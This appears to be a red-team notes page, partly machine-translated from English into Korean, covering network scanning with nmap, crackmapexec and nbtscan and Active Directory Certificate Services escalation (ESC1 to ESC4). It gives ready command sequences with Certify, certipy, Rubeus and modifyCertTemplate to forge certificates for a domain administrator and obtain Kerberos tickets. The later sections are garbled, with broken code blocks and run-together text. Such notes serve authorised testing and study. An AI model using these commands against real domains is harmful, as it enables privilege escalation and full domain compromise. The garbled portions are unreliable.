
RedTeam/Pentest 노트 및 실험 — 전문 업무와 관련된 여러 인프라에서 테스트된 내용.
여러 통제된 환경/인프라에서 수행된 나의 침투 테스트/레드팀 실험에 대한 공개 노트로, 보안 평가 중 침투 테스터와 레드팀이 사용하는 다양한 도구와 기술을 다룹니다.
GitHub 풀 리퀘스트를 통한 기여를 환영합니다.
어려운 작업을 해낸 분들에게 감사와 찬사를 보냅니다.
면책 조항
교육 목적으로만 사용하시기 바랍니다. 사용에 대한 책임은 본인에게 있습니다.
네트워크에서 실행 중인 도메인 이름과 Windows 머신에 대한 정보를 수집합니다.```bash bash$ cd /usr/share/Responder/tools bash$ sudo python RunFinger.py -i 192.168.1.1/24
또는```bash
bash$ responder-RunFinger
IP 네트워크에서 NetBIOS 이름 정보를 스캔합니다.```bash bash$ sudo nbtscan -v -s : 192.168.1.0/24
## Crackmapexec v 4.0
SMB 정보를 기반으로 네트워크 범위를 스캔합니다.```bash
bash$ cme smb 192.168.1.1/24
모든 머신 네트워크를 스캔하고 출력을 저장합니다 .
빠른 스캔```bash bash$ nmap -p 1-65535 -sV -sS -T4 -oA output target_IP
집중 스캔 (참고: 권장됨):```bash
bash$ nmap -p 1-65535 -Pn -A -oA output target_IP
실행 중인 서비스 버전을 열거하여 스캔 :
## Angry IP scanner
Download the tool from this link :
[Angry IP Scanner](http://angryip.org/download/#linux)
* Change the preferences settings
> Go to : Preferences -> Ports -> add 80,445,554,21 ,22 in the port selection <br>
> Go to : Preferences -> Display -> select Alive Hosts <br>
> Go to : Preferences -> Pinging -> select Combained (UDP/TCP)
# Lateral Movement and Exploitation
### Active Directory Certificate Services
This part was copied from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#esc1---misconfigured-certificate-templates
<br>For more details check : https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
(Tested on private environment (Bloodhound then ESC1 exploit)
* Find ADCS Server
* `crackmapexec ldap domain.lab -u username -p password -M adcs`
* `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump`
#### ESC1 - Misconfigured Certificate Templates
> Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject.
Requirements:
* Template that allows for AD authentication
* **ENROLLEE_SUPPLIES_SUBJECT** flag
* [PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage)
Exploitation:
* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates
```ps1
Certify.exe find /vulnerable
Certify.exe find /vulnerable /currentuser
# or
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
# or
certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
```
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
```ps1
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
certi.py req 'contoso.local/[email protected]' contoso-DC01-CA -k -n --alt-name han --template UserSAN
certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]'
```
* Use OpenSSL and convert the certificate, do not enter a password
```ps1
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```
* Move the cert.pfx to the target machine filesystem and request a TGT for the altname user using Rubeus
```ps1
Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx
```
**WARNING**: These certificates will still be usable even if the user or computer resets their password!
**NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints.
#### ESC2 - Misconfigured Certificate Templates
Requirements:
* Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0)
Exploitation:
* Find template ```ps1
PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
/altname을 도메인 관리자로 지정하는 인증서를 요청합니다. (ESC1에서와 같이)ESC3는 인증서 템플릿에 인증서 요청 에이전트 EKU(등록 에이전트)가 지정된 경우입니다. 이 EKU는 다른 사용자를 대신하여 인증서를 요청하는 데 사용될 수 있습니다.
mspki-certificate-name-flag플래그를 도메인 인증을 허용하는 템플릿에 활성화하면, 공격자가 템플릿에 "잘못된 구성을 밀어넣어 ESC1 취약점으로 이어질 수 있습니다
WriteProperty 값이 00000000-0000-0000-0000-000000000000인 것을 modifyCertTemplate을 사용하여 검색합니다 ```ps1
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl
ENROLLEE_SUPPLIES_SUBJECT (ESS) 플래그를 추가하여 ESC1을 수행합니다. ```ps1
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag